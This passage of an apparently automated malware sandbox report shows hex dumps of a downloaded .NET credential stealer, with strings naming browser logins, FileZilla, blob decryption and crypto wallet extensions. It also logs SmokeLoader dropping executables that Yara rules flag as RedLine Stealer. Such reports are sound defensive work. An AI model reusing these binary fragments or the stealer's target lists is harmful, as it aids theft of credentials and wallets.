                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3284INData Raw: 00 02 00 c5 01 b7 00 01 00 c6 01 b7 00 02 00 c7 01 b9 00 01 00 c8 01 b9 00 02 00 c9 01 bb 00 01 00 ca 01 bb 00 02 00 cb 01 bd 00 01 00 cc 01 bd 00 02 00 cd 01 bf 00 01 00 ce 01 bf 00 02 00 cf 01 c1 00 01 00 d0 01 c1 00 02 00 d1 01 c3 00 01 00 d2 01 c3 00 02 00 d4 01 c5 00 01 00 d5 01 c5 00 02 00 12 02 c7 00 02 00 14 02 c9 00 06 00 28 00 13 00 56 00 20 04 17 00 56 00 22 04 19 00 56 00 24 04 1b 00 56 00 26 04 1d 00 56 00 28 04 1f 00 56 00 2a 04 21 00 56 00 2c 04 23 00 2c 2b 36 2b 1f 00 30 00 65 00 6d 00 99 00 a0 00 af 00 be 00 e8 00 f4 00 0b 01 17 01 2e 01 3a 01 51 01 5d 01 93 01 cf 01 08 02 29 02 8a 02 91 02 24 04 5c 04 75 04 c2 04 1b 05 65 05 6b 05 77 05 ae 05 b6 05 be 05 0f 06 57 06 67 06 7b 06 a6 06 11 07 1a 07 22 07 2b 07 4c 08 54 08 82 08 8f 08 9b 08
                                                                                                                                                                                                  Data Ascii: (V V"V$V&V(V*!V,#,+6+0em.:Q])$\uekwWg{"+LT
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3288INData Raw: 5f 33 00 3c 3e 70 5f 5f 33 00 46 75 6e 63 60 33 00 67 65 74 5f 49 64 33 00 73 65 74 5f 49 64 33 00 64 76 73 6a 69 6f 68 71 33 00 61 73 64 6b 39 79 33 00 45 6e 74 69 74 79 33 00 34 45 46 34 37 32 45 32 45 37 34 31 31 36 43 37 46 44 39 35 43 37 34 41 42 34 32 32 43 43 46 38 30 44 42 31 43 34 30 34 00 5f 5f 53 74 61 74 69 63 41 72 72 61 79 49 6e 69 74 54 79 70 65 53 69 7a 65 3d 31 34 00 67 65 74 5f 49 64 31 34 00 73 65 74 5f 49 64 31 34 00 45 6e 74 69 74 79 31 34 00 5f 5f 53 74 61 74 69 63 41 72 72 61 79 49 6e 69 74 54 79 70 65 53 69 7a 65 3d 31 32 34 00 5f 5f 53 74 61 74 69 63 41 72 72 61 79 49 6e 69 74 54 79 70 65 53 69 7a 65 3d 32 34 00 49 64 32 34 00 73 64 66 6f 38 6e 32 33 34 00 67 6b 64 73 69 38 79 32 33 34 00 34 36 38 38 34 37 31 33 42 32 46 38 38 32
                                                                                                                                                                                                  Data Ascii: _3<>p__3Func`3get_Id3set_Id3dvsjiohq3asdk9y3Entity34EF472E2E74116C7FD95C74AB422CCF80DB1C404__StaticArrayInitTypeSize=14get_Id14set_Id14Entity14__StaticArrayInitTypeSize=124__StaticArrayInitTypeSize=24Id24sdfo8n234gkdsi8y23446884713B2F882
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3292INData Raw: 44 45 53 4b 54 4f 50 56 45 52 54 52 45 53 00 42 43 52 59 50 54 5f 4b 45 59 5f 4c 45 4e 47 54 48 53 5f 53 54 52 55 43 54 00 63 62 49 56 00 70 62 49 56 00 76 61 6c 75 65 5f 5f 00 46 69 6c 65 5a 69 6c 6c 61 00 63 62 44 61 74 61 00 44 6f 77 6e 6c 6f 61 64 44 61 74 61 00 50 72 6f 74 65 63 74 65 64 44 61 74 61 00 62 45 6e 63 72 79 70 74 65 64 44 61 74 61 00 63 62 41 75 74 68 44 61 74 61 00 70 62 41 75 74 68 44 61 74 61 00 52 65 61 64 52 61 77 44 61 74 61 00 6d 73 63 6f 72 6c 69 62 00 44 65 63 72 79 70 74 42 6c 6f 62 00 3c 3e 63 00 52 65 6c 65 61 73 65 48 64 63 00 47 65 74 48 64 63 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 00 66 75 6e 63 00 67 65 74 5f 4d 61 6e 61 67 65 64 54 68 72 65 61 64 49 64 00 3c 3e 6c 5f 5f 69 6e 69
                                                                                                                                                                                                  Data Ascii: DESKTOPVERTRESBCRYPT_KEY_LENGTHS_STRUCTcbIVpbIVvalue__FileZillacbDataDownloadDataProtectedDatabEncryptedDatacbAuthDatapbAuthDataReadRawDatamscorlibDecryptBlob<>cReleaseHdcGetHdcSystem.Collections.Genericfuncget_ManagedThreadId<>l__ini
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3296INData Raw: 69 66 69 63 61 74 65 56 61 6c 69 64 61 74 69 6f 6e 43 61 6c 6c 62 61 63 6b 00 67 65 74 5f 53 65 72 76 65 72 43 65 72 74 69 66 69 63 61 74 65 56 61 6c 69 64 61 74 69 6f 6e 43 61 6c 6c 62 61 63 6b 00 73 65 74 5f 53 65 72 76 65 72 43 65 72 74 69 66 69 63 61 74 65 56 61 6c 69 64 61 74 69 6f 6e 43 61 6c 6c 62 61 63 6b 00 63 61 6c 6c 62 61 63 6b 00 49 73 4c 6f 6f 70 62 61 63 6b 00 50 72 65 43 68 65 63 6b 00 45 6e 75 6d 43 6f 6f 6b 00 53 63 61 6e 43 6f 6f 6b 00 50 72 65 73 65 6e 74 61 74 69 6f 6e 46 72 61 6d 65 77 6f 72 6b 00 75 70 64 61 74 65 54 61 73 6b 00 54 72 79 43 6f 6d 70 6c 65 74 65 54 61 73 6b 00 41 6c 6c 6f 63 48 47 6c 6f 62 61 6c 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 67 65 74 5f 4c 6f 63 61 6c 00 4d 61 72 73 68 61 6c 00 58 35 30 39 43 65 72 74 69 66
                                                                                                                                                                                                  Data Ascii: ificateValidationCallbackget_ServerCertificateValidationCallbackset_ServerCertificateValidationCallbackcallbackIsLoopbackPreCheckEnumCookScanCookPresentationFrameworkupdateTaskTryCompleteTaskAllocHGlobalFreeHGlobalget_LocalMarshalX509Certif
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3300INData Raw: 6f 6e 73 00 73 65 61 72 63 68 50 61 74 74 65 72 6e 73 00 70 61 74 74 65 72 6e 73 00 47 65 74 44 65 76 69 63 65 43 61 70 73 00 47 65 74 43 61 70 73 00 66 74 70 73 00 67 65 74 5f 43 68 61 72 73 00 67 65 74 5f 4f 75 74 67 6f 69 6e 67 4d 65 73 73 61 67 65 48 65 61 64 65 72 73 00 54 72 79 49 6e 69 74 44 65 66 65 6e 64 65 72 73 00 64 65 66 65 6e 64 65 72 73 00 73 63 61 6e 6e 65 72 73 00 52 75 6e 74 69 6d 65 48 65 6c 70 65 72 73 00 54 72 79 49 6e 69 74 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 00 69 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 00 47 65 74 42 72 6f 77 73 65 72 73 00 54 72 79 49 6e 69 74 42 72 6f 77 73 65 72 73 00 62 72 6f 77 73 65 72 73 00 6c 6f 67 69 6e 50 61 69 72 73 00 53 73 6c 50 6f 6c 69 63 79 45 72 72 6f 72 73 00 73 73 6c 50 6f
                                                                                                                                                                                                  Data Ascii: onssearchPatternspatternsGetDeviceCapsGetCapsftpsget_Charsget_OutgoingMessageHeadersTryInitDefendersdefendersscannersRuntimeHelpersTryInitInstalledBrowsersinstalledBrowsersGetBrowsersTryInitBrowsersbrowsersloginPairsSslPolicyErrorssslPo
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3304INData Raw: 53 00 74 00 72 00 65 00 61 00 6d 00 00 57 42 00 43 00 72 00 46 00 69 00 6c 00 65 00 2e 00 52 00 65 00 61 00 64 00 79 00 70 00 74 00 44 00 65 00 73 00 46 00 69 00 6c 00 65 00 2e 00 52 00 65 00 61 00 64 00 74 00 72 00 6f 00 79 00 4b 00 46 00 69 00 6c 00 65 00 2e 00 52 00 65 00 61 00 64 00 65 00 79 00 00 13 46 00 69 00 6c 00 65 00 2e 00 52 00 65 00 61 00 64 00 00 59 42 00 43 00 46 00 69 00 6c 00 65 00 2e 00 4f 00 70 00 65 00 6e 00 72 00 79 00 70 00 74 00 47 00 65 00 46 00 69 00 6c 00 65 00 2e 00 4f 00 70 00 65 00 6e 00 74 00 50 00 72 00 6f 00 70 00 65 00 46 00 69 00 6c 00 65 00 2e 00 4f 00 70 00 65 00 6e 00 72 00 74 00 79 00 00 13 46 00 69 00 6c 00 65 00 2e 00 4f 00 70 00 65 00 6e 00 00 73 42 00 43 00 46 00 69 00 6c 00 65 00 2e 00 43 00 6c 00 6f 00 73 00 65
                                                                                                                                                                                                  Data Ascii: StreamWBCrFile.ReadyptDesFile.ReadtroyKFile.ReadeyFile.ReadYBCFile.OpenryptGeFile.OpentPropeFile.OpenrtyFile.OpensBCFile.Close
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3309INData Raw: 6c 00 61 00 63 00 65 00 00 05 38 00 30 00 00 05 38 00 31 00 00 0f 30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 00 00 00 38 b6 3b 21 6d c3 a8 47 bf bc 20 82 74 93 8a 88 00 03 20 00 01 04 20 01 01 08 05 20 01 01 11 15 04 20 01 01 0e 05 20 01 01 11 1d 03 20 00 02 07 15 12 35 01 12 81 00 04 20 00 13 00 03 20 00 1c 08 15 12 80 a5 01 12 81 00 08 20 00 15 12 35 01 13 00 04 20 00 12 55 1d 07 09 15 12 2d 01 12 80 c8 15 12 35 01 0e 15 11 39 01 0e 0e 12 81 18 12 80 c8 0e 0e 03 07 15 12 2d 01 12 80 c8 06 15 12 49 02 0e 0e 05 20 02 01 1c 18 19 10 02 02 15 12 80 a5 01 1e 01 15 12 80 a5 01 1e 00 15 12 49 02 1e 00 1e 01 04 0a 02 0e 0e 06 15 12 80 a5 01 0e 05 15 12 35 01 0e 02 06 0e 05 20 02 0e 0e 0e 05 15 12 2d 01 0e 08 20 00 15 11 39 01 13 00 05 15 11 39 01 0e 04 20 00 12
                                                                                                                                                                                                  Data Ascii: lace80810.0.0.08;!mG t 5 5 U-59-I I5 - 99
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3313INData Raw: 79 50 65 72 6d 69 73 73 69 6f 6e 41 74 74 72 69 62 75 74 65 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 15 01 54 02 10 53 6b 69 70 56 65 72 69 66 69 63 61 74 69 6f 6e 01 01 15 04 06 12 80 b4 04 06 12 80 81 02 06 08 04 06 1d 12 38 06 06 15 12 2d 01 0e 0d 06 15 12 80 a5 01 15 11 80 b1 02 0e 0e 03 06 1d 05 02 06 0b 03 06 1d 0e 05 06 1d 11 80 bc 05 06 1d 11 80 c0 04 06 11 81 08 04 06 12 80 e5 02 06 05 04 06 11 80 a0 02 06 02 09 06 15 12 80 a5 01 12 80 a8 02 06 0a 08 06 15 12 31 01 12 80 d4 08 06 15 12 31 01 12 80 c4 08 06 15 12 31 01 12 80 d0 08 06 15 12 31 01 12 80 cc 04 06
                                                                                                                                                                                                  Data Ascii: yPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TSkipVerification8-1111
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3317INData Raw: 00 61 00 45 00 6e 00 76 00 69 00 72 00 6f 00 6e 00 6d 00 65 00 6e 00 74 00 6d 00 69 00 6e 00 67 00 00 00 00 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5c 00 4c 00 6f 00 63 00 61 00 6c 00 5c 00 00 00 00 00 5b 00 5e 00 5c 00 75 00 30 00 30 00 32 00 30 00 2d 00 5c 00 75 00 30 00 30 00 37 00 46 00 5d 00 55 00 4e 00 4b 00 4e 00 4f 00 57 00 4e 00 00 00 4c 00 6f 00 63 00 61 00 6c 00 20 00 53 00 74 00 61 00 74 00 65 00 00 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 64 00 00 00 00 00 00 00 31 00 2a 00 2e 00 31 00 6c 00 31 00 64 00 31 00 62 00 00 00 00 00 00 00 50 00 72 00 6f 00 66 00 69 00 6c 00 65 00 5f 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 5f 00 76 00 61 00 6c 00 75 00 65 00 00 00 25 00 61 00 70 00 70 00 64 00 61 00 74 00 61 00 25 00
                                                                                                                                                                                                  Data Ascii: aEnvironmentmingAppData\Local\[^\u0020-\u007F]UNKNOWNLocal StateProcessId1*.1l1d1bProfile_encrypted_value%appdata%
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3320INData Raw: 63 00 48 00 78 00 43 00 61 00 57 00 35 00 68 00 62 00 6d 00 4e 00 6c 00 51 00 32 00 68 00 68 00 61 00 57 00 34 00 4b 00 62 00 32 00 52 00 69 00 5a 00 6e 00 42 00 6c 00 5a 00 57 00 6c 00 6f 00 5a 00 47 00 74 00 69 00 61 00 57 00 68 00 74 00 62 00 33 00 42 00 72 00 59 00 6d 00 70 00 74 00 62 00 32 00 39 00 75 00 5a 00 6d 00 46 00 75 00 62 00 47 00 4a 00 6d 00 59 00 32 00 78 00 38 00 51 00 6e 00 4a 00 68 00 64 00 6d 00 56 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 48 00 42 00 6e 00 62 00 47 00 5a 00 6f 00 5a 00 32 00 5a 00 75 00 61 00 47 00 4a 00 6e 00 63 00 47 00 70 00 6b 00 5a 00 57 00 35 00 71 00 5a 00 32 00 31 00 6b 00 5a 00 32 00 39 00 6c 00 61 00 57 00 46 00 77 00 63 00 47 00 46 00 6d 00 62 00 47 00 35 00 38 00 52 00 33 00 56 00 68
                                                                                                                                                                                                  Data Ascii: cHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3Vh
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3324INData Raw: 20 20 20 20 20 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: </requestedPrivileges> </security> </trustInfo></assembly>


                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:29:12
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\X5lLjSzDd8.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\X5lLjSzDd8.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:342528 bytes
                                                                                                                                                                                                  MD5 hash:743F8FEC87EBF7C5D6B392261EC3988F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:29:19
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\X5lLjSzDd8.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\X5lLjSzDd8.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:342528 bytes
                                                                                                                                                                                                  MD5 hash:743F8FEC87EBF7C5D6B392261EC3988F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.341140573.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.341021768.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:29:27
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                  Imagebase:0x7ff662bf0000
                                                                                                                                                                                                  File size:3933184 bytes
                                                                                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.320895536.0000000002F91000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:09
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\rfudbri
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\rfudbri
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:342528 bytes
                                                                                                                                                                                                  MD5 hash:743F8FEC87EBF7C5D6B392261EC3988F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 51%, ReversingLabs
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:11
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\BEE7.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:285184 bytes
                                                                                                                                                                                                  MD5 hash:8EF1AE58E545946BACA2DBC17E135577
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:17
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\DA6F.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\DA6F.exe
                                                                                                                                                                                                  Imagebase:0xce0000
                                                                                                                                                                                                  File size:2893312 bytes
                                                                                                                                                                                                  MD5 hash:D6F23ADF6D5B20A214640C56E570AB2E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.565633208.0000000003F96000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 23%, Metadefender, Browse
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:20
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\BEE7.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\BEE7.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:285184 bytes
                                                                                                                                                                                                  MD5 hash:8EF1AE58E545946BACA2DBC17E135577
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.416663548.0000000002410000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.416737725.0000000002431000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Imagebase:0x750000
                                                                                                                                                                                                  File size:399360 bytes
                                                                                                                                                                                                  MD5 hash:5E34695C9F46F1E69CE731D3B7359C88
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.475010529.0000000003B4F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000013.00000002.478488816.0000000003D03000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.478488816.0000000003D03000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 37%, Metadefender, Browse
                                                                                                                                                                                                  • Detection: 67%, ReversingLabs
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:22
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\rfudbri
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\rfudbri
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:342528 bytes
                                                                                                                                                                                                  MD5 hash:743F8FEC87EBF7C5D6B392261EC3988F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.430943063.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.431087130.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:23
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\FB48.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\FB48.exe
                                                                                                                                                                                                  Imagebase:0x560000
                                                                                                                                                                                                  File size:189440 bytes
                                                                                                                                                                                                  MD5 hash:0198C5A612317A06F11ABBE95294408E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 34%, Metadefender, Browse
                                                                                                                                                                                                  • Detection: 70%, ReversingLabs
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:33
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Imagebase:0x110000
                                                                                                                                                                                                  File size:399360 bytes
                                                                                                                                                                                                  MD5 hash:5E34695C9F46F1E69CE731D3B7359C88
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:34
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2D0D.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\2D0D.exe
                                                                                                                                                                                                  Imagebase:0x1210000
                                                                                                                                                                                                  File size:2897408 bytes
                                                                                                                                                                                                  MD5 hash:A77F1ED5881D44FC95BF3DA05C349385
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.563047294.0000000004032000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:10:30:38
                                                                                                                                                                                                  Start date:18/11/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\E8E7.exe
                                                                                                                                                                                                  Imagebase:0x470000
                                                                                                                                                                                                  File size:399360 bytes
                                                                                                                                                                                                  MD5 hash:5E34695C9F46F1E69CE731D3B7359C88
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
